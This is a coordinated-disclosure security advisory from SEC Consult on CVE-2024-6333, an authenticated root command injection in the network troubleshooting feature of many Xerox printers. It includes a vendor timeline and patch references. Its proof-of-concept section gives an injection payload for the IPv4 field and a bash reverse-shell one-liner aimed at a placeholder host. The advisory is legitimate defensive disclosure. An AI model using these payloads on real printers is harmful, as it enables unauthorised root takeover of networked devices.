Share
## https://sploitus.com/exploit?id=PACKETSTORM:182371
SEC Consult Vulnerability Lab Security Advisory < 20241023-0 >  
=======================================================================  
title: Authenticated Remote Code Execution  
product: Multiple Xerox printers  
(EC80xx, AltaLink, VersaLink, WorkCentre)  
vulnerable version: see vulnerable versions below  
fixed version: see solution section below  
CVE number: CVE-2024-6333  
impact: high  
homepage: https://xerox.com  
found: 2023-12-14  
by: Timo Longin (Office Vienna)  
Tamas Jos (Office Zurich)  
SEC Consult Vulnerability Lab  
  
An integrated part of SEC Consult, an Eviden business  
Europe | Asia  
  
https://www.sec-consult.com  
  
=======================================================================  
  
Vendor description:  
-------------------  
"We are a global leader in office and production print technology and related  
solutions, with a large and growing presence in Digital and IT Services.  
Having redefined the workplace experience for more than 100 years, our  
differentiated business and technology offerings are empowering client success  
today by addressing the productivity challenges of a hybrid workplace and  
distributed workforce."  
  
Source: https://investors.xerox.com/  
  
  
Business recommendation:  
------------------------  
SEC Consult recommends Xerox customers to install the latest updates and review  
the vendor's security note for further information.  
  
Also make sure to have patches from previous security notes installed, such as  
XRX23-020. SEC Consult has re-identified some critical 0-days (unauthenticated RCE,  
partial authentication bypass) that were already patched but not clearly  
communicated in the previous security notes.  
  
SEC Consult highly recommends to perform a thorough security review of the product  
conducted by security professionals to identify and resolve potential further  
security issues.  
  
  
Vulnerability overview/description:  
-----------------------------------  
1) Authenticated Remote Code Execution (RCE) (CVE-2024-6333)  
An attacker authenticated as a user with administrative access to the  
web interface of a range of affected Xerox printers can exploit a remote code  
execution vulnerability (RCE) as root user. It allows an attacker to execute  
commands directly on the operating system of the printer with root permissions.  
Consequently, the target Xerox printer can be fully compromised.  
  
  
Proof of concept:  
-----------------  
1) Authenticated Remote Code Execution (RCE) (CVE-2024-6333)  
The "Network Troubleshooting" menu enables administrators to configure and run  
network troubleshooting based on the tcpdump tool. The web interface allows to  
apply custom filters like an IPv4 address as well as specific network services,  
as seen in the image (figure 1) below.  
  
<img Network_Troubleshooting.png>  
  
Due to insufficient input validation in the IPv4 address value, an attacker  
may inject further OS commands into the final tcpdump command string. For  
example, by setting the IPv4 address to the value "0.0.0.0$(bash $TMP~cmd)",  
commands stored under "/tmp/~cmd" get executed, when starting a network  
troubleshooting session.  
  
Note: The payload in the IPv4 address must bypass a character filter,  
and was kept simple for demonstration purposes. Other payloads that directly  
execute commands without requiring the "/tmp/~cmd" file exist and can be  
crafted.  
  
An attacker who, for example, has previously exploited the unauthenticated  
RCE vulnerability (fixed with Xerox Security Bulletin XRX23-020) can plant  
the following commands for a reverse shell in to "/tmp/~cmd".  
  
-------------------------------------------------------------------------------  
  
bash -i >/dev/tcp/X.X.X.X/10004 0>&1 2>&1  
  
-------------------------------------------------------------------------------  
  
Since, the network troubleshooting service is running tcpdump with root  
permissions, full access to a range of Xerox printers can be obtained this way.  
See figure 2 below.  
  
<img reverse_shell.png>  
  
  
Vulnerable versions:  
-----------------------------  
The following products & versions have been tested initially, which were not  
patched to the latest version according to vendor. Hence our other identified  
critical security issues were removed from this advisory.  
* Xerox Workcentre 7970 (073.200.167.09610)  
* Xerox Workcentre 7855 (073.040.167.09610)  
  
According to the vendor, the following products are affected:  
  
* AltaLink® B8045 / B8055 / B8065 / B8075 / B8090 (<103.xxx.024.18600 866140v3)  
* AltaLink® C8030 / C8035 / C8045 / C8055 / C8070 (<103.xxx.024.18600 866140v3)  
* Xerox® EC8036 / EC8056 (<103.xxx.024.18600 872818v3)  
* Xerox® EC8036 / EC8056 - Common Criteria (June 2022) (<103.023.031.35105 878257v3)  
* Xerox® EC8036 / EC8056 - Common Criteria (June 2024) (<103.xxx.013.14115 869823v3)  
* AltaLink®C8130 / C8135 / C8145 / C8155 / C8170 - Common Criteria (Aug 2024) (<119.xxx.023.13006 869829v3)  
* AltaLink® B8145 / B8155 / B8170 - Common Criteria (Aug 2024) (<119.xxx.023.13006 869829v3)  
* AltaLink® C8130 / C8135 / C8145 / C8155 / C8170 - Common Criteria Certified (Aug 2023) (<111.xxx.003.11600 869827v3)  
* AltaLink® B8145 / B8155 / B8170 - Common Criteria Certified (Aug 2023) (<111.xxx.003.11600 869827v3)  
* VersaLink® B625 / C625 - Common Criteria Certified (2024) (<119.xxx.003.11705 869818v3)  
* VersaLink® B415 / C415 - Common Criteria Certified (2024) (<119.xxx.003.11705 869818v3)  
* WorkCentre 3655/3655i (<075.060.004.07810 via Upgrade Tool)  
* WorkCentre 5945/55i (<075.091.004.07810 via Upgrade Tool)  
* WorkCentre 6655/6655i (<075.110.004.07810 via Upgrade Tool)  
* WorkCentre 7220/7225i (<075.030.004.07810 via Upgrade Tool)  
* WorkCentre 7830/7835i (<075.010 004.07810 via Upgrade Tool)  
* WorkCentre 7845/7855i (<075.040.004.07810 via Upgrade Tool)  
* WorkCentre 7845/7855 (IBG) (<075.080.004.07810 via Upgrade Tool)  
* WorkCentre 7970/7970i (<075.200.004.07810 via Upgrade Tool)  
* WorkCentre EC7836 (<075.050.004.07810 via Upgrade Tool)  
* WorkCentre EC7856 (<075.020.004.07810 via Upgrade Tool)  
  
  
Vendor contact timeline:  
------------------------  
2024-02-05: Contacting vendor through the Xerox Security Response Center (XSRC)  
https://forms.business.xerox.com/en-us/xerox-security-response-center/  
2024-02-06: Xerox assigns case id XSRC-2024-0003  
2024-02-08: Xerox provides links for the current firmware versions to confirm  
whether the issues can be reproduced.  
2024-02-27: Xerox asks for status update.  
2024-02-28: The authenticated RCE was confirmed to be exploitable in the current  
firmware version (075.040.013.29000 and 075.200.013.29000).  
Vulnerability one and two are fixed in the most recent versions.  
2024-03-19: Xerox requests more information on provided PoCs.  
2024-04-02: SEC Consult provides the requested information.  
2024-04-18: SEC Consult asks for updates on the vulnerability status.  
2024-05-06: Xerox provides an update/patch for the affected WorkCentre7890 and 7855  
series.  
2024-05-16: SEC Consult asks about a CVE number for the authenticated RCE  
vulnerability. Also SEC Consult inquires about for further plans on  
confirming the affected models and versions that are potentially  
affected by the partial authentication bypass and pre-authenticated RCE  
vulnerabilities.  
2024-05-21: Xerox states that they are evaluating other models. Also, they request  
a CVSS score and vector for the authenticated RCE. Furthermore, more  
details on the public disclosure timeline are requested.  
2024-05-23: SEC Consult provides the requested information.  
2024-06-03: Status update from Xerox regarding CVE-ID request. Furthermore,  
more information on the to be released advisory is requested.  
2024-06-06: Status update from Xerox regarding CVE-ID request.  
2024-06-10: Xerox again requests a CVSS score and vector for the authenticated RCE.  
2024-06-14: SEC Consult again provides the CVSS score and vector. Also, information  
on the to be released advisory is provided.  
2024-06-25: Xerox provides CVE-2024-6333 for the authenticated RCE vulnerability.  
2024-06-28: Informing Xerox about longer vacation period / absence.  
Asking again about further affected models.  
2024-07-01: Xerox: Further models are affected, will be shared in the final publication.  
2024-07-16: Xerox asks for our publication draft.  
2024-07-31: Xerox asks again for our publication draft.  
2024-07-31: SEC Consult reminds Xerox about vacation, references our draft advisory  
already sent a few months ago. Asking whether the other models are  
affected by the authenticated RCE only, or by the other identified  
vulnerabilities as well.  
2024-08-28: Xerox provides high-level summary of the case, but no details on affected  
models.  
2024-10-03: SEC Consult provides an updated advisory with minor changes to Xerox,  
again asking whether other versions and models are affected by the  
described vulnerabilities.  
2024-10-07: Xerox provides further information on the partial authentication bypass  
and pre-authenticated RCE vulnerabilities, showing that these have been  
addressed in previous patches. Also, further coordination regarding  
Xerox' Security Bulletin Release.  
2024-10-16: Release of Xerox Security Bulletin XRX24-015, covering the authenticated  
RCE vulnerability.  
2024-10-21: Sending latest advisory draft to Xerox, setting release date to 23rd October.  
Asking Xerox whether the security bulletin XRX23-020   
(https://securitydocs.business.xerox.com/wp-content/uploads/2023/11/XRX23-020_Security-Bulletin-for-AltaLink-VersaLink-and-WorkCentre-1.pdf) is the correct one for the other issues and why there is no   
mention  
regarding our pre-auth RCE there.  
Xerox responds with the link to the latest XRX24-015 bulletin and that  
our advisory is fine.  
2024-10-23: Coordinated release of advisory.  
  
  
Solution:  
---------  
Xerox provided patches for the affected printers. More information can be found  
in Xerox' Security Bulletin XRX24-015:  
  
https://securitydocs.business.xerox.com/wp-content/uploads/2024/10/Xerox-Security-Bulletin-XRX24-015-for-Altalink-Versalink-and-WorkCentre-%E2%80%93-CVE-2024-6333-.pdf  
  
  
Workaround:  
-----------  
None  
  
  
Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/  
  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
SEC Consult Vulnerability Lab  
An integrated part of SEC Consult, an Eviden business  
Europe | Asia  
  
About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Eviden business. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/  
  
Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: https://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult  
  
EOF Timo Longin, Tamas Jos / @2024